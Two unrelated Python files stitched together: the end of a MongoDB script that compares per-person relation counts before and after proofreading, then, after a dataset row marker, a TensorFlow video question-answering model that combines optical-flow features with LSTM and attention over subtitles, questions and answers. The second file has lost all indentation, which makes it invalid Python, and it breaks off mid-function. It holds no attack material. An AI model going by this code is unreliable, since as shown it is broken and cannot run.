#         print("重复 " + x["person_id"])
#
# for x in col_nlp_extract_base_check_person1.find():
#     if x["person_id"] not in id_list:
#         print(x["person_id"])
# Count relations per person_1_id before proofreading.
col_pro_6_3_id_mapping_before = client["earth_gis_temp"]["pro_6_3_id_mapping_before"]
person_id2count1 = Counter(
    doc["person_1_id"] for doc in col_pro_6_3_id_mapping_before.find()
)
# Count relations per person_1_id after proofreading.
col_history_proofreading_rel = client["earth_gis_temp"]["history_proofreading_rel"]
person_id2count2 = Counter(
    doc["person_1_id"] for doc in col_history_proofreading_rel.find()
)
# Report any person whose relation count changed, or who disappeared,
# between the pre- and post-proofreading relation collections.
if len(person_id2count1) != len(person_id2count2):
    print("关系库人数,校验前后不一致")
for person_id, rel_count in person_id2count1.items():
    if person_id not in person_id2count2:
        print("person_1_id:" + person_id + "不在校验后库中")
    elif rel_count != person_id2count2[person_id]:
        print("person_1_id:" + person_id + "校验前后,关系数不一致")
19,269 | 2bc68145071a54a8c5fba3a41ee81c0f7bc0537e | import glob
import sys
import os
import tensorflow as tf
import h5py as hf
import numpy as np
sys.path.append("./kinetics-i3d")
import i3d2
import video_rnn
import text_rnn_cudnn
TOWER_NAME = 'tower'
# def build_graph(FLAGS, rgb_input, flow_input, sub, q, ac, a, rgb_seq_len, flow_seq_len,sub_seq_len, q_seq_len):
def build_graph(FLAGS, vocab_embedding, flow_input, sub, q, a0, a1, a2, a3, a4, a, qid, flow_seq_len, sub_seq_len,
q_seq_len, a0_seq_len, a1_seq_len, a2_seq_len, a3_seq_len, a4_seq_len, prob, text_prob, is_training):
# with tf.device("/GPU:0"):
regularizer = tf.contrib.layers.l2_regularizer(scale=FLAGS.wd)
vocab_embedding_tensor = tf.convert_to_tensor(vocab_embedding, dtype=tf.float32)
sub_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, sub)
q_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, q)
a0_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a0)
a1_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a1)
a2_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a2)
a3_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a3)
a4_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a4)
sub_tensor = tf.cast(sub_tensor, tf.float32)
q_tensor = tf.cast(q_tensor, tf.float32)
a0_tensor = tf.cast(a0_tensor, tf.float32)
a1_tensor = tf.cast(a1_tensor, tf.float32)
a2_tensor = tf.cast(a2_tensor, tf.float32)
a3_tensor = tf.cast(a3_tensor, tf.float32)
a4_tensor = tf.cast(a4_tensor, tf.float32)
'''
with tf.variable_scope("RGB"):
rgb_model = i3d.InceptionI3d(FLAGS.num_classes, spatial_squeeze=True, final_endpoint='Logits')
rgb_logits, _ = rgb_model(rgb_input, is_training=is_training[0][0], dropout_keep_prob=prob[0][0])
# rgb_logits = tf.layers.dense(rgb_logits, 300, activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
# name="rgb_fc")
# rgb_logits = tf.nn.dropout(rgb_logits, prob[0][0])
rgb_logits = tf.expand_dims(rgb_logits, 1)
'''
# with tf.device("/GPU:1"):
with tf.variable_scope("Flow"):
flow_model = i3d2.InceptionI3d(FLAGS.num_classes, spatial_squeeze=True, final_endpoint='Logits')
flow_logits, _ = flow_model(flow_input, is_training=is_training[0][0], dropout_keep_prob=prob[0][0])
# flow_logits = tf.layers.dense(flow_logits, 300, activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
# name="flow_fc")
# flow_logits = tf.nn.dropout(flow_logits, prob[0][0])
# flow_logits = tf.expand_dims(flow_logits, 1)
# with tf.device("/GPU:2"):
# with tf.variable_scope("Video_RNN"):
# rgb_rnn_model = video_rnn.vRNN("GRU", FLAGS.num_hidden, 'rgb', FLAGS)
# flow_rnn_model = video_rnn.vRNN("GRU", FLAGS.num_hidden, 'flow', FLAGS)
# rgb_rnn_logits = rgb_rnn_model.build(rgb_logits, is_training=FLAGS.is_training, seq_len=rgb_seq_len)
# flow_rnn_logits = flow_rnn_model.build(flow_logits, is_training=FLAGS.is_training, seq_len=flow_seq_len)
# rgb_rnn_logits = tf.layers.batch_normalization(rgb_rnn_logits)
# flow_rnn_logits = tf.layers.batch_normalization(flow_rnn_logits)
# rgb_rnn_logits = tf.reduce_mean(rgb_rnn_logits, axis=1, keepdims=True)
# flow_rnn_logits = tf.reduce_mean(flow_rnn_logits, axis=1, keepdims=True)
# rgb_rnn_logits = tf.nn.l2_normalize(rgb_rnn_logits, axis=2)
# flow_rnn_logits = tf.nn.l2_normalize(flow_rnn_logits, axis=2)
with tf.variable_scope("Text_LSTM", reuse=tf.AUTO_REUSE):
'''
def apply_softmax(elem):
pass
def apply_attention(elem):
previous = 0
attention_sum_logit = tf.zeros(tf.shape(elem[0]))
attention_sum_logit = tf.map_fn(lambda x: attention_sum_logit + tf.multiply())
for i in elem[1]:
attention_logit = elem[0][previous:i]
attention_logit = tf.multiply(attention_logit, elem[2])
attention_logit = tf.nn.softmax(attention_logit)
attention_logit = tf.reduce_sum(attention_logit, axis=0, keepdims=True)
if not attention_sum_logit:
attention_sum_logit = attention_logit
else:
attention_sum_logit = tf.stack([attention_sum_logit, attention_logit], axis=0)
return attention_sum_logit
'''
text_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, 'question')
# question_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, 'question')
# answer_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, 'answer')
# answer_rnn_model = text_rnn_cudnn.tRNN_answer("GRU", 200, 'answer')
# subtitle_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, 'subtitle')
question_rnn_logits = text_rnn_model.build(q_tensor, dropout_keep_prob=text_prob, seq_len=q_seq_len)
subtitle_rnn_logits = text_rnn_model.build(sub_tensor, dropout_keep_prob=text_prob, seq_len=sub_seq_len)
answer0_rnn_logits = text_rnn_model.build(a0_tensor, dropout_keep_prob=text_prob, seq_len=a0_seq_len)
answer1_rnn_logits = text_rnn_model.build(a1_tensor, dropout_keep_prob=text_prob, seq_len=a1_seq_len)
answer2_rnn_logits = text_rnn_model.build(a2_tensor, dropout_keep_prob=text_prob, seq_len=a2_seq_len)
answer3_rnn_logits = text_rnn_model.build(a3_tensor, dropout_keep_prob=text_prob, seq_len=a3_seq_len)
answer4_rnn_logits = text_rnn_model.build(a4_tensor, dropout_keep_prob=text_prob, seq_len=a4_seq_len)
with tf.variable_scope("Text_BiDAF_subtitle_question", reuse=tf.AUTO_REUSE):
# subtitle_attention_ex = tf.expand_dims(subtitle_rnn_logits, 2)
# subtitle_attention = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
# tf.shape(subtitle_rnn_logits)[1],
# tf.shape(question_rnn_logits)[1],
# FLAGS.num_hidden * 2])
# question_attention = tf.expand_dims(question_rnn_logits, 1)
# question_attention = tf.broadcast_to(question_attention, [tf.shape(question_rnn_logits)[0],
# tf.shape(subtitle_rnn_logits)[1],
# tf.shape(question_rnn_logits)[1],
# FLAGS.num_hidden * 2])
# subtitle_question_mul = tf.multiply(subtitle_attention, question_attention)
# subtitle_question_concat = tf.concat([subtitle_attention, question_attention, subtitle_question_mul],
# axis=3)
# subtitle_question_similarity = tf.layers.dense(subtitle_question_concat, 1, use_bias=False,
# name='subtitle_question_similarity',
# kernel_regularizer=regularizer)
# subtitle_question_similarity = tf.squeeze(subtitle_question_similarity, axis=[3])
subtitle_question_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(question_rnn_logits, perm=[0, 2, 1]))
subtitle_question_c2q = tf.nn.softmax(subtitle_question_similarity)
subtitle_question_c2q = tf.matmul(subtitle_question_c2q, question_rnn_logits)
# subtitle_question_b = tf.nn.softmax(tf.reduce_max(subtitle_question_similarity, axis=2))
# subtitle_question_b = tf.expand_dims(subtitle_question_b, 1)
# subtitle_question_q2c = tf.matmul(subtitle_question_b, subtitle_rnn_logits)
# subtitle_question_g = tf.concat([subtitle_rnn_logits, subtitle_question_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_question_q2c)], axis=2)
with tf.variable_scope("Text_BiDAF_subtitle_answer", reuse=tf.AUTO_REUSE):
'''
answer0_attention = tf.expand_dims(answer0_rnn_logits, 1)
answer1_attention = tf.expand_dims(answer1_rnn_logits, 1)
answer2_attention = tf.expand_dims(answer2_rnn_logits, 1)
answer3_attention = tf.expand_dims(answer3_rnn_logits, 1)
answer4_attention = tf.expand_dims(answer4_rnn_logits, 1)
answer0_attention = tf.broadcast_to(answer0_attention, [tf.shape(answer0_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer0_rnn_logits)[1],
FLAGS.num_hidden * 2])
answer1_attention = tf.broadcast_to(answer1_attention, [tf.shape(answer1_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer1_rnn_logits)[1],
FLAGS.num_hidden * 2])
answer2_attention = tf.broadcast_to(answer2_attention, [tf.shape(answer2_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer2_rnn_logits)[1],
FLAGS.num_hidden * 2])
answer3_attention = tf.broadcast_to(answer3_attention, [tf.shape(answer3_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer3_rnn_logits)[1],
FLAGS.num_hidden * 2])
answer4_attention = tf.broadcast_to(answer4_attention, [tf.shape(answer4_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer4_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention0 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer0_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention1 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer1_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention2 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer2_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention3 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer3_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention4 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer4_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_answer0_mul = tf.multiply(subtitle_attention0, answer0_attention)
subtitle_answer1_mul = tf.multiply(subtitle_attention1, answer1_attention)
subtitle_answer2_mul = tf.multiply(subtitle_attention2, answer2_attention)
subtitle_answer3_mul = tf.multiply(subtitle_attention3, answer3_attention)
subtitle_answer4_mul = tf.multiply(subtitle_attention4, answer4_attention)
subtitle_answer0_concat = tf.concat([subtitle_attention0, answer0_attention, subtitle_answer0_mul], axis=3)
subtitle_answer1_concat = tf.concat([subtitle_attention1, answer1_attention, subtitle_answer1_mul], axis=3)
subtitle_answer2_concat = tf.concat([subtitle_attention2, answer2_attention, subtitle_answer2_mul], axis=3)
subtitle_answer3_concat = tf.concat([subtitle_attention3, answer3_attention, subtitle_answer3_mul], axis=3)
subtitle_answer4_concat = tf.concat([subtitle_attention4, answer4_attention, subtitle_answer4_mul], axis=3)
subtitle_answer0_similarity = tf.layers.dense(subtitle_answer0_concat, 1, use_bias=False,
name='subtitle_answer_similarity',
kernel_regularizer=regularizer)
subtitle_answer0_similarity = tf.squeeze(subtitle_answer0_similarity, axis=[3])
subtitle_answer1_similarity = tf.layers.dense(subtitle_answer1_concat, 1, use_bias=False,
name='subtitle_answer_similarity', reuse=True,
kernel_regularizer=regularizer)
subtitle_answer1_similarity = tf.squeeze(subtitle_answer1_similarity, axis=[3])
subtitle_answer2_similarity = tf.layers.dense(subtitle_answer2_concat, 1, use_bias=False,
name='subtitle_answer_similarity', reuse=True,
kernel_regularizer=regularizer)
subtitle_answer2_similarity = tf.squeeze(subtitle_answer2_similarity, axis=[3])
subtitle_answer3_similarity = tf.layers.dense(subtitle_answer3_concat, 1, use_bias=False,
name='subtitle_answer_similarity', reuse=True,
kernel_regularizer=regularizer)
subtitle_answer3_similarity = tf.squeeze(subtitle_answer3_similarity, axis=[3])
subtitle_answer4_similarity = tf.layers.dense(subtitle_answer4_concat, 1, use_bias=False,
name='subtitle_answer_similarity', reuse=True,
kernel_regularizer=regularizer)
subtitle_answer4_similarity = tf.squeeze(subtitle_answer4_similarity, axis=[3])
'''
subtitle_answer0_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer0_rnn_logits, perm=[0, 2, 1]))
subtitle_answer1_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer1_rnn_logits, perm=[0, 2, 1]))
subtitle_answer2_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer2_rnn_logits, perm=[0, 2, 1]))
subtitle_answer3_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer3_rnn_logits, perm=[0, 2, 1]))
subtitle_answer4_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer4_rnn_logits, perm=[0, 2, 1]))
subtitle_answer0_c2q = tf.nn.softmax(subtitle_answer0_similarity)
subtitle_answer0_c2q = tf.matmul(subtitle_answer0_c2q, answer0_rnn_logits)
subtitle_answer1_c2q = tf.nn.softmax(subtitle_answer1_similarity)
subtitle_answer1_c2q = tf.matmul(subtitle_answer1_c2q, answer1_rnn_logits)
subtitle_answer2_c2q = tf.nn.softmax(subtitle_answer2_similarity)
subtitle_answer2_c2q = tf.matmul(subtitle_answer2_c2q, answer2_rnn_logits)
subtitle_answer3_c2q = tf.nn.softmax(subtitle_answer3_similarity)
subtitle_answer3_c2q = tf.matmul(subtitle_answer3_c2q, answer3_rnn_logits)
subtitle_answer4_c2q = tf.nn.softmax(subtitle_answer4_similarity)
subtitle_answer4_c2q = tf.matmul(subtitle_answer4_c2q, answer4_rnn_logits)
# subtitle_answer0_b = tf.nn.softmax(tf.reduce_max(subtitle_answer0_similarity, axis=2))
# subtitle_answer0_b = tf.expand_dims(subtitle_answer0_b, 1)
# subtitle_answer1_b = tf.nn.softmax(tf.reduce_max(subtitle_answer1_similarity, axis=2))
# subtitle_answer1_b = tf.expand_dims(subtitle_answer1_b, 1)
# subtitle_answer2_b = tf.nn.softmax(tf.reduce_max(subtitle_answer2_similarity, axis=2))
# subtitle_answer2_b = tf.expand_dims(subtitle_answer2_b, 1)
# subtitle_answer3_b = tf.nn.softmax(tf.reduce_max(subtitle_answer3_similarity, axis=2))
# subtitle_answer3_b = tf.expand_dims(subtitle_answer3_b, 1)
# subtitle_answer4_b = tf.nn.softmax(tf.reduce_max(subtitle_answer4_similarity, axis=2))
# subtitle_answer4_b = tf.expand_dims(subtitle_answer4_b, 1)
# subtitle_answer0_q2c = tf.matmul(subtitle_answer0_b, subtitle_rnn_logits)
# subtitle_answer1_q2c = tf.matmul(subtitle_answer1_b, subtitle_rnn_logits)
# subtitle_answer2_q2c = tf.matmul(subtitle_answer2_b, subtitle_rnn_logits)
# subtitle_answer3_q2c = tf.matmul(subtitle_answer3_b, subtitle_rnn_logits)
# subtitle_answer4_q2c = tf.matmul(subtitle_answer4_b, subtitle_rnn_logits)
concat_subtitle_query0 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer0_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer0_c2q)], axis=2)
concat_subtitle_query1 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer1_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer1_c2q)], axis=2)
concat_subtitle_query2 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer2_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer2_c2q)], axis=2)
concat_subtitle_query3 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer3_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer3_c2q)], axis=2)
concat_subtitle_query4 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer4_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer4_c2q)], axis=2)
# subtitle_answer0_g = tf.concat([subtitle_rnn_logits, subtitle_answer0_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer0_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer0_q2c)], axis=2)
# subtitle_answer1_g = tf.concat([subtitle_rnn_logits, subtitle_answer1_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer1_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer1_q2c)], axis=2)
# subtitle_answer2_g = tf.concat([subtitle_rnn_logits, subtitle_answer2_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer2_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer2_q2c)], axis=2)
# subtitle_answer3_g = tf.concat([subtitle_rnn_logits, subtitle_answer3_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer3_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer3_q2c)], axis=2)
# subtitle_answer4_g = tf.concat([subtitle_rnn_logits, subtitle_answer4_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer4_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer4_q2c)], axis=2)
# with tf.device("/GPU:1"):
'''
with tf.variable_scope("RGB_question_match", reuse=tf.AUTO_REUSE):
question_d = tf.reduce_max(question_rnn_logits, axis=1, keepdims=True)
# question_rgb = tf.layers.dense(question_d, 300, name="RGB_question_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# question_rgb = tf.nn.dropout(question_rgb, prob[0][0])
rgb_question_mul = tf.matmul(tf.transpose(question_d, perm=[0, 2, 1]), rgb_logits)
rgb_question_similarity = tf.nn.softmax(rgb_question_mul)
rgb_question_masked = tf.matmul(rgb_question_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
with tf.variable_scope("RGB_answer_match", reuse=tf.AUTO_REUSE):
answer0_d = tf.reduce_max(answer0_rnn_logits, axis=1, keepdims=True)
answer1_d = tf.reduce_max(answer1_rnn_logits, axis=1, keepdims=True)
answer2_d = tf.reduce_max(answer2_rnn_logits, axis=1, keepdims=True)
answer3_d = tf.reduce_max(answer3_rnn_logits, axis=1, keepdims=True)
answer4_d = tf.reduce_max(answer4_rnn_logits, axis=1, keepdims=True)
# answer0_rgb = tf.layers.dense(answer0_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer1_rgb = tf.layers.dense(answer1_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, reuse=True)
# answer2_rgb = tf.layers.dense(answer2_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, reuse=True)
# answer3_rgb = tf.layers.dense(answer3_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, reuse=True)
# answer4_rgb = tf.layers.dense(answer4_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, reuse=True)
# answer0_rgb = tf.nn.dropout(answer0_rgb, prob[0][0])
# answer1_rgb = tf.nn.dropout(answer1_rgb, prob[0][0])
# answer2_rgb = tf.nn.dropout(answer2_rgb, prob[0][0])
# answer3_rgb = tf.nn.dropout(answer3_rgb, prob[0][0])
# answer4_rgb = tf.nn.dropout(answer4_rgb, prob[0][0])
rgb_answer0_mul = tf.matmul(tf.transpose(answer0_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer1_mul = tf.matmul(tf.transpose(answer1_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer2_mul = tf.matmul(tf.transpose(answer2_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer3_mul = tf.matmul(tf.transpose(answer3_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer4_mul = tf.matmul(tf.transpose(answer4_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer0_similarity = tf.nn.softmax(rgb_answer0_mul)
rgb_answer1_similarity = tf.nn.softmax(rgb_answer1_mul)
rgb_answer2_similarity = tf.nn.softmax(rgb_answer2_mul)
rgb_answer3_similarity = tf.nn.softmax(rgb_answer3_mul)
rgb_answer4_similarity = tf.nn.softmax(rgb_answer4_mul)
rgb_answer0_masked = tf.matmul(rgb_answer0_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
rgb_answer1_masked = tf.matmul(rgb_answer1_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
rgb_answer2_masked = tf.matmul(rgb_answer2_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
rgb_answer3_masked = tf.matmul(rgb_answer3_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
rgb_answer4_masked = tf.matmul(rgb_answer4_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
with tf.variable_scope("RGB_question_answer_att_layer", reuse=tf.AUTO_REUSE):
rgb_question_answer0_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer0_masked, perm=[0, 2, 1]))
rgb_question_answer1_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer1_masked, perm=[0, 2, 1]))
rgb_question_answer2_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer2_masked, perm=[0, 2, 1]))
rgb_question_answer3_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer3_masked, perm=[0, 2, 1]))
rgb_question_answer4_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer4_masked, perm=[0, 2, 1]))
rgb_question_answer0_cnn = tf.layers.conv1d(rgb_question_answer0_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
kernel_initializer=tf.initializers.random_normal, name="rgb_conv")
rgb_question_answer1_cnn = tf.layers.conv1d(rgb_question_answer1_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="rgb_conv", reuse=True)
rgb_question_answer2_cnn = tf.layers.conv1d(rgb_question_answer2_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="rgb_conv", reuse=True)
rgb_question_answer3_cnn = tf.layers.conv1d(rgb_question_answer3_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="rgb_conv", reuse=True)
rgb_question_answer4_cnn = tf.layers.conv1d(rgb_question_answer4_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="rgb_conv", reuse=True)
rgb_question_answer0_cnn = tf.nn.dropout(rgb_question_answer0_cnn, prob[0][0])
rgb_question_answer1_cnn = tf.nn.dropout(rgb_question_answer1_cnn, prob[0][0])
rgb_question_answer2_cnn = tf.nn.dropout(rgb_question_answer2_cnn, prob[0][0])
rgb_question_answer3_cnn = tf.nn.dropout(rgb_question_answer3_cnn, prob[0][0])
rgb_question_answer4_cnn = tf.nn.dropout(rgb_question_answer4_cnn, prob[0][0])
rgb_question_answer0_cnn = tf.squeeze(rgb_question_answer0_cnn, 2)
rgb_question_answer1_cnn = tf.squeeze(rgb_question_answer1_cnn, 2)
rgb_question_answer2_cnn = tf.squeeze(rgb_question_answer2_cnn, 2)
rgb_question_answer3_cnn = tf.squeeze(rgb_question_answer3_cnn, 2)
rgb_question_answer4_cnn = tf.squeeze(rgb_question_answer4_cnn, 2)
rgb_question_answer0_fc = tf.layers.dense(rgb_question_answer0_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc')
rgb_question_answer1_fc = tf.layers.dense(rgb_question_answer1_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc', reuse=True)
rgb_question_answer2_fc = tf.layers.dense(rgb_question_answer2_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc', reuse=True)
rgb_question_answer3_fc = tf.layers.dense(rgb_question_answer3_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc', reuse=True)
rgb_question_answer4_fc = tf.layers.dense(rgb_question_answer4_att, 1, activation=tf.nn.leaky_relu,
kernel_regularizer=regularizer, name='rgb_mask_fc', reuse=True)
rgb_question_answer0_fc = tf.nn.dropout(rgb_question_answer0_fc, prob[0][0])
rgb_question_answer1_fc = tf.nn.dropout(rgb_question_answer1_fc, prob[0][0])
rgb_question_answer2_fc = tf.nn.dropout(rgb_question_answer2_fc, prob[0][0])
rgb_question_answer3_fc = tf.nn.dropout(rgb_question_answer3_fc, prob[0][0])
rgb_question_answer4_fc = tf.nn.dropout(rgb_question_answer4_fc, prob[0][0])
rgb_question_answer0_fc = tf.squeeze(rgb_question_answer0_fc, 2)
rgb_question_answer1_fc = tf.squeeze(rgb_question_answer1_fc, 2)
rgb_question_answer2_fc = tf.squeeze(rgb_question_answer2_fc, 2)
rgb_question_answer3_fc = tf.squeeze(rgb_question_answer3_fc, 2)
rgb_question_answer4_fc = tf.squeeze(rgb_question_answer4_fc, 2)
'''
with tf.variable_scope("Flow_train_question_match", reuse=tf.AUTO_REUSE):
flow_logits = tf.layers.dense(flow_logits, 400, name="Flow_text_fc", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu)
flow_logits = tf.nn.dropout(flow_logits, prob[0][0])
flow_logits = tf.layers.batch_normalization(flow_logits, training=is_training[0][0])
question_flow = tf.layers.dense(question_rnn_logits, 400, name="Flow_question_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu)
# question_d = tf.reduce_max(question_rnn_logits, axis=1, keepdims=True)
# question_flow = tf.layers.dense(question_d, 300, name="flow_question_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
question_flow = tf.nn.dropout(question_flow, prob[0][0])
question_flow = tf.layers.batch_normalization(question_flow, training=is_training[0][0])
flow_question_mul = tf.matmul(flow_logits, tf.transpose(question_flow, perm=[0, 2, 1]))
flow_question_similarity = tf.nn.softmax(flow_question_mul)
flow_question_masked = tf.matmul(flow_question_similarity, question_flow)
# flow_question_masked = tf.matmul(flow_question_similarity, tf.transpose(flow_logits, perm=[0, 2, 1]))
# flow_question_masked = tf.squeeze(flow_question_masked, axis=2)
with tf.variable_scope("Flow_train_answer_match", reuse=tf.AUTO_REUSE):
# answer0_d = tf.reduce_max(answer0_rnn_logits, axis=1, keepdims=True)
# answer1_d = tf.reduce_max(answer1_rnn_logits, axis=1, keepdims=True)
# answer2_d = tf.reduce_max(answer2_rnn_logits, axis=1, keepdims=True)
# answer3_d = tf.reduce_max(answer3_rnn_logits, axis=1, keepdims=True)
# answer4_d = tf.reduce_max(answer4_rnn_logits, axis=1, keepdims=True)
# answer0_flow = tf.layers.dense(answer0_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer1_flow = tf.layers.dense(answer1_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer2_flow = tf.layers.dense(answer2_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer3_flow = tf.layers.dense(answer3_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer4_flow = tf.layers.dense(answer4_d, 300, name="flow_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
answer0_flow = tf.layers.dense(answer0_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu)
answer1_flow = tf.layers.dense(answer1_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu, reuse=True)
answer2_flow = tf.layers.dense(answer2_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu, reuse=True)
answer3_flow = tf.layers.dense(answer3_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu, reuse=True)
answer4_flow = tf.layers.dense(answer4_rnn_logits, 400, name="Flow_answer_dense", kernel_regularizer=regularizer,
activation=tf.nn.leaky_relu, reuse=True)
answer0_flow = tf.nn.dropout(answer0_flow, prob[0][0])
answer1_flow = tf.nn.dropout(answer1_flow, prob[0][0])
answer2_flow = tf.nn.dropout(answer2_flow, prob[0][0])
answer3_flow = tf.nn.dropout(answer3_flow, prob[0][0])
answer4_flow = tf.nn.dropout(answer4_flow, prob[0][0])
answer0_flow = tf.layers.batch_normalization(answer0_flow, training=is_training[0][0])
answer1_flow = tf.layers.batch_normalization(answer1_flow, training=is_training[0][0])
answer2_flow = tf.layers.batch_normalization(answer2_flow, training=is_training[0][0])
answer3_flow = tf.layers.batch_normalization(answer3_flow, training=is_training[0][0])
answer4_flow = tf.layers.batch_normalization(answer4_flow, training=is_training[0][0])
